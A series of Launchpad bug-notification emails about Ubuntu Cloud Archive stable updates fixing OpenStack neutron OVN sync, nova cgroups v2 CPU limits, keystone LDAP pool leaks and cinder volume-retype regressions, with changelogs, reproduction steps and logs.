[Yahoo-eng-team] [Bug 1961112] Re: [ovn] overlapping security group rules break neutron-ovn-db-sync-util
This bug was fixed in the package neutron - 2:16.4.2-0ubuntu6.4~cloud0 --- neutron (2:16.4.2-0ubuntu6.4~cloud0) bionic-ussuri; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:16.4.2-0ubuntu6.4) focal; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-continue-on-duplicate-normalise.patch: Cherry-picked from upstream to allow ovn_db_sync to continue on duplicate normalised CIDR (LP: #1961112). * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/ovn-specify-port-type-if-router-port-when-updating.patch: Specify port type if it's a router port when updating to avoid port flapping (LP: #1955578). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked form upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/1961112 Title: [ovn] overlapping security group rules break neutron-ovn-db-sync-util Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: Neutron (Xena) is happy to accept equivalent rules with overlapping remote CIDR prefix as long as the notation is different, e.g. 10.0.0.0/8 and 10.0.0.1/8. However, OVN is smarter, normalizes the prefix and figures out that they both are 10.0.0.0/8. This does not have any fatal effects in a running OVN deployment (creating and using such rules does not even trigger a warning) but upon running neutron-ovn-db-sync-util, it crashes and won't perform a sync. This is a blocker for upgrades (and other scenarios). Security group's rules: $ openstack security group rule list overlap-sgr +--+-+---+++---+---+--+ | ID | IP Protocol | Ethertype | IP Range | Port Range | Direction | Remote Security Group | Remote Address Group | +--+-+---+++---+---+--+ | 3c41fa80-1d23-49c9-9ec1-adf581e07e24 | tcp | IPv4 | 10.0.0.1/8 || ingress | None | None | | 639d263e-6873-47cb-b2c4-17fc824252db | None| IPv4 | 0.0.0.0/0 || egress| None | None | | 96e99039-cbc0-48fe-98fe-ef28d41b9d9b | tcp | IPv4 | 10.0.0.0/8 || ingress | None | None | | bf9160a3-fc9b-467e-85d5-c889811fd6ca | None| IPv6 | ::/0 || egress| None | None | +--+-+---+++---+---+--+ Log excerpt: 16/Feb/2022:20:55:40.568 527216 INFO neutron.cmd.ovn.neutron_ovn_db_sync_util [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Sync for Northbound db started with mode : repair 16/Feb/2022:20:55:42.105 527216 INFO neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.extensions.qos [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Starting OVNClientQosExtension 16/Feb/2022:20:55:42.380 527216 INFO neutron.db.ovn_revision_numbers_db [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Successfully bumped revision number for resource 49b3249a-7624-4711-b271-3e63c6a27658 (type: ports) to 17 16/Feb/2022:20:55:43.205 527216 WARNING neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_db_sync [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] ACLs-to-be-added 1 ACLs-to-be-removed 0 16/Feb/2022:20:55:43.206 527216 WARNING neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_db_sync [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] ACL found in Neutron but not in OVN DB for port group pg_e90b68f3_9f8d_4250_9b6a_7531e2249c99 16/Feb/2022:20:55:43.208 527216 ERROR ovsdbapp.backend.ovs_idl.transaction [req-c595a893-db9b-484e-ae8a-bb7dbe8b31f3 - - - - -] Traceback (most recent call last): Â Â File "/usr/lib/python3/dist-packages/ovsdbapp/backend/ovs_idl/connection.py", line 131, in run txn.results.put(txn.do_commit()) Â Â File
[Yahoo-eng-team] [Bug 2008943] Re: OVN DB Sync utility cannot find NB DB Port Group
This bug was fixed in the package neutron - 2:16.4.2-0ubuntu6.4~cloud0 --- neutron (2:16.4.2-0ubuntu6.4~cloud0) bionic-ussuri; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:16.4.2-0ubuntu6.4) focal; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-continue-on-duplicate-normalise.patch: Cherry-picked from upstream to allow ovn_db_sync to continue on duplicate normalised CIDR (LP: #1961112). * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/ovn-specify-port-type-if-router-port-when-updating.patch: Specify port type if it's a router port when updating to avoid port flapping (LP: #1955578). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked form upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2008943 Title: OVN DB Sync utility cannot find NB DB Port Group Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in Ubuntu Cloud Archive xena series: Fix Released Status in neutron: In Progress Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Bug description: Runtime exception: ovsdbapp.backend.ovs_idl.idlutils.RowNotFound: Cannot find Port_Group with name=pg_aa9f203b_ec51_4893_9bda_cfadbff9f800 can occure while performing database sync between Neutron db and OVN NB db using neutron-ovn-db-sync-util. This exception occures when the `sync_networks_ports_and_dhcp_opts()` function ends up implicitly creating a new default security group for a tenant/project id. This is normally ok but the problem is that `sync_port_groups` was already called and thus the port_group does not exists in NB DB. When the `sync_acls()` is called later there is no port group found and exception occurs. Quick way to reproduce on ML2/OVN: - openstack project create test_project - openstack create network --project test_project test_network - openstack port delete $(openstack port list --network test_network -c ID -f value) # since this is an empty network only the metadata port should get listed and subsequently deleted - openstack security group delete test_project So now that you have a network without a metadata port in it and no default security group for the project/tenant that this network belongs to run neutron-ovn-db-sync-util --config-file /etc/neutron/neutron.conf --config-file /etc/neutron/plugins/ml2/ml2_conf.ini --ovn- neutron_sync_mode migrate The exeption should occur Here is a more realistic scenario how we can run into this with ML2/OVS to ML2/OVN migration. I am also including why the code runs into it. 1. ML2/OVS enviroment with a network but no default security group for the project/tenant associated with the network 2. Perform ML2/OVS to ML2/OVN migration. This migration process will run neutron-ovn-db-sync-util with --migrate 3. During the sync we first sync port groups[1] from Neutron DB to OVN DB 4. Then we sync network ports [2]. The process will detect that the network in question is not part of OVN NB. It will create that network in OVN NB db and along with that it will create a metadata port for it(OVN network requires metadataport). The Port_create call will implicitly notify _ensure_default_security_group_handler which will not find securty group for that tenant/project id and create one. Now you have a new security group with 4 new default security group rules. 5. When sync_acls[4] runs it will pick up those 4 new rules but commit to NB DB will fail since the port_group(aka security group) does not exists in NB DB [1] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L104 [2] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L10 [3] https://opendev.org/openstack/neutron/src/branch/master/neutron/db/securitygroups_db.py#L915 [4] https://opendev.org/openstack/neutron/src/branch/master/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L107 = Ubuntu SRU Details = [Impact] See bug description. [Test Case] Deploy openstack with OV
[Yahoo-eng-team] [Bug 2030773] Re: OVN DB Sync always logs warning messages about updating all router ports
This bug was fixed in the package neutron - 2:16.4.2-0ubuntu6.4~cloud0 --- neutron (2:16.4.2-0ubuntu6.4~cloud0) bionic-ussuri; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:16.4.2-0ubuntu6.4) focal; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-continue-on-duplicate-normalise.patch: Cherry-picked from upstream to allow ovn_db_sync to continue on duplicate normalised CIDR (LP: #1961112). * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/ovn-specify-port-type-if-router-port-when-updating.patch: Specify port type if it's a router port when updating to avoid port flapping (LP: #1955578). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked form upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2030773 Title: OVN DB Sync always logs warning messages about updating all router ports Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: Reported at: https://bugzilla.redhat.com/show_bug.cgi?id=2225156 The ovn-db-sync script does not check if the router ports are actually out-of-sync before adding it to the list of ports that needs to be updated, this can create red herring problems by introducing an irrelevant piece of information [0] in the sync report (specially when ran in "log" mode) making the user think that the databases might be out-of-sync even when it is not. Looking at the code [1] we can see that the comment talks about checking the networks and ipv6_ra_configs changes but it does neither; instead, it adds every router port to the list of ports that needs to be updated. # We dont have to check for the networks and # ipv6_ra_configs values. Lets add it to the # update_lrport_list. If they are in sync, then # update_router_port will be a no-op. update_lrport_list.append(db_router_ports[lrport]) This LP is about changing this behavior and checking for such differences in the router ports before marking them to be updated. [0] 2023-07-24 11:46:31.391 952358 WARNING networking_ovn.ovn_db_sync [req-1081a8a6-82dd-431c-a2ab-f58741dc1677 - - - - -] Router Port port_id=f164c0f1-8ac8-4c45-bba9-8c723a30c701 needs to be updated for networks changed [1] https://github.com/openstack/neutron/blob/c453813d0664259c4da0d132f224be2eebe70072/neutron/plugins/ml2/drivers/ovn/mech_driver/ovsdb/ovn_db_sync.py#L553-L557 = Ubuntu SRU Details = [Impact] See bug description above. [Test Case] Deploy openstack with OVN and multiple routers. Run the ovn-db-sync script and ensure router ports that are not out of sync are not marked to be updated. [Where problems could occur] If the _is_router_port_changed() function had a bug there would be potential for ports to be filtered out that need updating. Presumably this is not the case, but that is a theoritical potential for where problems could occur. All of these patches have already landed in the corresponding upstream branches. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2030773/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 2032770] Re: [SRU] [OVN] port creation with --enable-uplink-status-propagation does not work with OVN mechanism driver
This bug was fixed in the package neutron - 2:16.4.2-0ubuntu6.4~cloud0 --- neutron (2:16.4.2-0ubuntu6.4~cloud0) bionic-ussuri; urgency=medium . * New update for the Ubuntu Cloud Archive. . neutron (2:16.4.2-0ubuntu6.4) focal; urgency=medium . [ Corey Bryant ] * d/p/ovn-db-sync-continue-on-duplicate-normalise.patch: Cherry-picked from upstream to allow ovn_db_sync to continue on duplicate normalised CIDR (LP: #1961112). * d/p/ovn-db-sync-check-for-router-port-differences.patch: Cherry-picked from upstream to ensure router ports are marked for needing updates only if they have changed (LP: #2030773). * d/p/ovn-specify-port-type-if-router-port-when-updating.patch: Specify port type if it's a router port when updating to avoid port flapping (LP: #1955578). * d/p/fix-acl-sync-when-default-sg-group-created.patch: Cherry-picked form upstream to fix ACL sync when default security group is created (LP: #2008943). . [ Mustafa Kemal GILOR ] * d/p/add_uplink_status_propagation.patch: Add the 'uplink-status-propagation' extension to ML2/OVN (LP: #2032770). ** Changed in: cloud-archive/ussuri Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to neutron. https://bugs.launchpad.net/bugs/2032770 Title: [SRU] [OVN] port creation with --enable-uplink-status-propagation does not work with OVN mechanism driver Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Released Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in neutron: Fix Released Status in neutron package in Ubuntu: Fix Released Status in neutron source package in Focal: Fix Released Status in neutron source package in Jammy: Fix Released Status in neutron source package in Lunar: Fix Released Bug description: [Impact] This SRU is a backport of https://review.opendev.org/c/openstack/neutron/+/892895 to the respective Ubuntu and UCA releases. The patch is merged to all respective upstream branches (master & stable/[u,v,w,x,y,z,2023.1(a)]). This SRU intends to add the missing 'uplink-status-propagation' extension to ML2/OVN. This extension is already present and working in ML2/OVS, and it is supported by ML2/OVN but the extension is somehow not added to ML2/OVN. The patch simply adds the missing extension to the ML2/OVN too. The impact of this is visible for the deployments migrating from ML2/OVS to ML2/OVN. The following command fails to work on ML2/OVN: ``` openstack port create --network 8d30fb08-2c6a-42fd-98c4-223d345c8c4f --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa # BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status' ``` The fix corrects this behavior by adding the missing extension. [Test Case] - Deploy a Focal/Yoga cloud: - ./generate-bundle.sh -s focal -r yoga --name test-focal-yoga-stack --run --ovn # After the dust settles - ./configure - source ./novarc - openstack port create --network --binding-profile trusted=true --enable-uplink-status-propagation --vnic-type direct aaa - It should fail with "BadRequestException: 400: Client Error for url: https://mycloud.example.com:9696/v2.0/ports, Unrecognized attribute(s) 'propagate_uplink_status'" To confirm the fix, repeat the scenario and observe that the error disappears and port creation succeeds. [Regression Potential] The patch is quite trivial and should not affect any deployment negatively. The extension is optional and disabled by default. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/2032770/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1978489] Re: libvirt / cgroups v2: cannot boot instance with more than 16 CPUs
This bug was fixed in the package nova - 3:25.2.1-0ubuntu2~cloud0 --- nova (3:25.2.1-0ubuntu2~cloud0) focal-yoga; urgency=medium . * New update for the Ubuntu Cloud Archive. . nova (3:25.2.1-0ubuntu2) jammy; urgency=medium . * d/p/libvirt-remove-default-cputune-shares-value.patch: Enable launch of instances with more than 9 CPUs on Jammy (LP: #1978489). ** Changed in: cloud-archive/yoga Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1978489 Title: libvirt / cgroups v2: cannot boot instance with more than 16 CPUs Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive yoga series: Fix Released Status in OpenStack Compute (nova): In Progress Status in nova package in Ubuntu: Fix Released Status in nova source package in Jammy: Fix Released Bug description: Description === Using the libvirt driver and a host OS that uses cgroups v2 (RHEL 9, Ubuntu Jammy), an instance with more than 16 CPUs cannot be booted. Steps to reproduce == 1. Boot an instance with 10 (or more) CPUs on RHEL 9 or Ubuntu Jammy using Nova with the libvirt driver. Expected result === Instance boots. Actual result = Instance fails to boot with a 'Value specified in CPUWeight is out of range' error. Environment === Originially report as a libvirt but in RHEL 9 [1] Additional information == This is happening because Nova defaults to 1024 * (# of CPUs) for the value of domain/cputune/shares in the libvirt XML. This is then passed directly by libvirt to the cgroups API, but cgroups v2 has a maximum value of 1. 1 / 1024 ~= 9.76 [1] https://bugzilla.redhat.com/show_bug.cgi?id=2035518 Ubuntu SRU Details: [Impact] See above. [Test Case] See above. [Regression Potential] We've had this change in other jammy-based versions of the nova package for a while now, including zed, antelope, bobcat. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1978489/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1998789] Please test proposed package
Hello Mustafa, or anyone else affected, Accepted keystone into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository. Please help us by testing this new package. To enable the -proposed repository: sudo add-apt-repository cloud-archive:ussuri-proposed sudo apt-get update Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance! ** Changed in: cloud-archive/ussuri Status: Fix Released => Fix Committed ** Tags added: verification-ussuri-needed -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Identity (keystone). https://bugs.launchpad.net/bugs/1998789 Title: [SRU] PooledLDAPHandler.result3 does not release pool connection back when an exception is raised Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive ussuri series: Fix Committed Status in Ubuntu Cloud Archive victoria series: Fix Released Status in Ubuntu Cloud Archive wallaby series: Fix Released Status in Ubuntu Cloud Archive xena series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in OpenStack Identity (keystone): Fix Released Status in keystone package in Ubuntu: Fix Released Status in keystone source package in Focal: Fix Released Status in keystone source package in Jammy: Fix Released Status in keystone source package in Lunar: Fix Released Bug description: [Impact] This SRU is a backport of https://review.opendev.org/c/openstack/keystone/+/866723 to the respective Ubuntu and UCA releases. The patch is merged to the all respective upstream branches (master & stable/[u,v,w,x,y,z]). This SRU intends to fix a denial-of-service bug that happens when keystone uses pooled ldap connections. In pooled ldap connection mode, keystone borrows a connection from the pool, do the LDAP operation and release it back to the pool. But, if an exception or error happens while the LDAP connection is still borrowed, Keystone fails to release the connection back to the pool, hogging it forever. If this happens for all the pooled connections, the connection pool will be exhausted and Keystone will no longer be able to perform LDAP operations. The fix corrects this behavior by allowing the connection to release back to the pool even if an exception/error happens during the LDAP operation. [Test Case] - Deploy an LDAP server of your choice - Fill it with many data so the search takes more than `pool_connection_timeout` seconds - Define a keystone domain with the LDAP driver with following options: [ldap] use_pool = True page_size = 100 pool_connection_timeout = 3 pool_retry_max = 3 pool_size = 10 - Point the domain to the LDAP server - Try to login to the OpenStack dashboard, or try to do anything that uses the LDAP user - Observe the /var/log/apache2/keystone_error.log, it should contain ldap.TIMEOUT() stack traces followed by `ldappool.MaxConnectionReachedError` stack traces To confirm the fix, repeat the scenario and observe that the "/var/log/apache2/keystone_error.log" does not contain `ldappool.MaxConnectionReachedError` stack traces and LDAP operation in motion is successful (e.g. OpenStack Dashboard login) [Regression Potential] The patch is quite trivial and should not affect any deployment in a negative way. The LDAP pool functionality can be disabled by setting "use_pool=False" in case of any regression. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1998789/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 1978489] Re: libvirt / cgroups v2: cannot boot instance with more than 16 CPUs
Re: > The same patch should also be available on cloud archive cloud:focal- yoga This will happen alongside the changes being made into 22.04 - the updates are in the yoga-proposed pocket at the moment. ** Also affects: cloud-archive Importance: Undecided Status: New ** Also affects: cloud-archive/yoga Importance: Undecided Status: New ** Changed in: cloud-archive Status: New => Invalid ** Changed in: cloud-archive/yoga Status: New => Fix Committed ** Changed in: cloud-archive/yoga Importance: Undecided => High ** Changed in: nova (Ubuntu Jammy) Importance: Undecided => High -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/1978489 Title: libvirt / cgroups v2: cannot boot instance with more than 16 CPUs Status in Ubuntu Cloud Archive: Invalid Status in Ubuntu Cloud Archive yoga series: Fix Committed Status in OpenStack Compute (nova): In Progress Status in nova package in Ubuntu: Confirmed Status in nova source package in Jammy: Fix Committed Bug description: Description === Using the libvirt driver and a host OS that uses cgroups v2 (RHEL 9, Ubuntu Jammy), an instance with more than 16 CPUs cannot be booted. Steps to reproduce == 1. Boot an instance with 10 (or more) CPUs on RHEL 9 or Ubuntu Jammy using Nova with the libvirt driver. Expected result === Instance boots. Actual result = Instance fails to boot with a 'Value specified in CPUWeight is out of range' error. Environment === Originially report as a libvirt but in RHEL 9 [1] Additional information == This is happening because Nova defaults to 1024 * (# of CPUs) for the value of domain/cputune/shares in the libvirt XML. This is then passed directly by libvirt to the cgroups API, but cgroups v2 has a maximum value of 1. 1 / 1024 ~= 9.76 [1] https://bugzilla.redhat.com/show_bug.cgi?id=2035518 Ubuntu SRU Details: [Impact] See above. [Test Case] See above. [Regression Potential] We've had this change in other jammy-based versions of the nova package for a while now, including zed, antelope, bobcat. To manage notifications about this bug go to: https://bugs.launchpad.net/cloud-archive/+bug/1978489/+subscriptions -- Mailing list: https://launchpad.net/~yahoo-eng-team Post to : yahoo-eng-team@lists.launchpad.net Unsubscribe : https://launchpad.net/~yahoo-eng-team More help : https://help.launchpad.net/ListHelp
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
This bug was fixed in the package cinder - 2:20.3.1-0ubuntu1.1~cloud0 --- cinder (2:20.3.1-0ubuntu1.1~cloud0) focal-yoga; urgency=medium . * New update for the Ubuntu Cloud Archive. . cinder (2:20.3.1-0ubuntu1.1) jammy; urgency=medium . * Revert driver assisted volume retype (LP: #2019190): - d/p/0001-Revert-Driver-assisted-migration-on-retype-when-it-s.patch ** Changed in: cloud-archive/yoga Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: Fix Released Status in cinder source package in Lunar: Won't Fix Status in cinder source package in Mantic: Fix Released Status in cinder source package in Noble: Fix Released Bug description: [Impact] See bug description for full details but short summary is that a patch landed in Wallaby release that introduced a regression whereby retyping an in-use volume leaves the attached volume in an inconsistent state with potential for data corruption. Result is that a vm does not receive updated connection_info from Cinder and will keep pointing to the old volume, even after reboot. [Test Plan] * Deploy Openstack with two Cinder RBD storage backends (different pools) * Create two volume types * Boot a vm from volume: openstack server create --wait --image jammy --flavor m1.small --key-name testkey --nic net-id=8c74f1ef-9231-46f4-a492-eccdb7943ecd testvm --boot-from-volume 10 * Retype the volume to type B: openstack volume set --type typeB --retype-policy on-demand * Go to compute host running vm and check that the vm is now copying data to the new location e.g. b68be47d-f526-4f98-a77b-a903bf8b6c65 which will eventually settle and change to: b68be47d-f526-4f98-a77b-a903bf8b6c65 * And lastly a reboot of the vm should be successfull. [Regression Potential] Given that the current state is potential data corruption and the patch will fix this by successfully refreshing connection info I do not see a regression potential. It is in fact fixing a regression. - While trying out the volume retype feature in cinder, we noticed that after an instance is rebooted it will not come back online and be stuck in an error state or if it comes back online, its filesystem is corrupted. ## Observations Say there are the two volume types `fast` (stored in ceph pool `volumes`) and `slow` (stored in ceph pool `volumes.hdd`). Before the retyping we can see that the volume for example is present in the `volumes.hdd` pool and has a watcher accessing the volume. ```sh [ceph: root@mon0 /]# rbd ls volumes.hdd volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes.hdd/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: watcher=[2001:XX:XX:XX::10ad]:0/3914407456 client.365192 cookie=140370268803456 ``` Starting the retyping process using the migration policy `on-demand` for that volume either via the horizon dashboard or the CLI causes the volume to be correctly transferred to the `volumes` pool within the ceph cluster. However, the watcher does not get transferred, so nobody is accessing the volume after it has been transferred. ```sh [ceph: root@mon0 /]# rbd ls volumes volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: none ``` Taking a look at the libvirt XML of the instance in question, one can see that the `rbd` volume path does not change after the retyping is completed. Therefore, if the instance is restarted nova will not be able to find its volume preventing an instance start. Pre retype ```xml [...] [...] ``` Po
[Yahoo-eng-team] [Bug 2019190] Re: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption)
This bug was fixed in the package cinder - 2:21.3.1-0ubuntu1.1~cloud0 --- cinder (2:21.3.1-0ubuntu1.1~cloud0) jammy-zed; urgency=medium . * revert driver assister volume retype (LP: #2019190) - d/p/0001-Revert-Driver-assisted-migration-on-retype-when-it-s.patch ** Changed in: cloud-archive/zed Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of Yahoo! Engineering Team, which is subscribed to OpenStack Compute (nova). https://bugs.launchpad.net/bugs/2019190 Title: [SRU][RBD] Retyping of in-use boot volumes renders instances unusable (possible data corruption) Status in Cinder: New Status in Cinder wallaby series: New Status in Ubuntu Cloud Archive: Fix Released Status in Ubuntu Cloud Archive antelope series: Fix Released Status in Ubuntu Cloud Archive bobcat series: Fix Released Status in Ubuntu Cloud Archive caracal series: Fix Released Status in Ubuntu Cloud Archive yoga series: Fix Released Status in Ubuntu Cloud Archive zed series: Fix Released Status in OpenStack Compute (nova): Invalid Status in cinder package in Ubuntu: Fix Released Status in cinder source package in Jammy: Fix Released Status in cinder source package in Lunar: Won't Fix Status in cinder source package in Mantic: Fix Released Status in cinder source package in Noble: Fix Released Bug description: [Impact] See bug description for full details but short summary is that a patch landed in Wallaby release that introduced a regression whereby retyping an in-use volume leaves the attached volume in an inconsistent state with potential for data corruption. Result is that a vm does not receive updated connection_info from Cinder and will keep pointing to the old volume, even after reboot. [Test Plan] * Deploy Openstack with two Cinder RBD storage backends (different pools) * Create two volume types * Boot a vm from volume: openstack server create --wait --image jammy --flavor m1.small --key-name testkey --nic net-id=8c74f1ef-9231-46f4-a492-eccdb7943ecd testvm --boot-from-volume 10 * Retype the volume to type B: openstack volume set --type typeB --retype-policy on-demand * Go to compute host running vm and check that the vm is now copying data to the new location e.g. b68be47d-f526-4f98-a77b-a903bf8b6c65 which will eventually settle and change to: b68be47d-f526-4f98-a77b-a903bf8b6c65 * And lastly a reboot of the vm should be successfull. [Regression Potential] Given that the current state is potential data corruption and the patch will fix this by successfully refreshing connection info I do not see a regression potential. It is in fact fixing a regression. - While trying out the volume retype feature in cinder, we noticed that after an instance is rebooted it will not come back online and be stuck in an error state or if it comes back online, its filesystem is corrupted. ## Observations Say there are the two volume types `fast` (stored in ceph pool `volumes`) and `slow` (stored in ceph pool `volumes.hdd`). Before the retyping we can see that the volume for example is present in the `volumes.hdd` pool and has a watcher accessing the volume. ```sh [ceph: root@mon0 /]# rbd ls volumes.hdd volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes.hdd/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: watcher=[2001:XX:XX:XX::10ad]:0/3914407456 client.365192 cookie=140370268803456 ``` Starting the retyping process using the migration policy `on-demand` for that volume either via the horizon dashboard or the CLI causes the volume to be correctly transferred to the `volumes` pool within the ceph cluster. However, the watcher does not get transferred, so nobody is accessing the volume after it has been transferred. ```sh [ceph: root@mon0 /]# rbd ls volumes volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 [ceph: root@mon0 /]# rbd status volumes/volume-81cfbafc-4fbb-41b0-abcb-8ec7359d0bf9 Watchers: none ``` Taking a look at the libvirt XML of the instance in question, one can see that the `rbd` volume path does not change after the retyping is completed. Therefore, if the instance is restarted nova will not be able to find its volume preventing an instance start. Pre retype ```xml [...] [...] ``` Post retype (no change) ```xml [...] [...] ``` 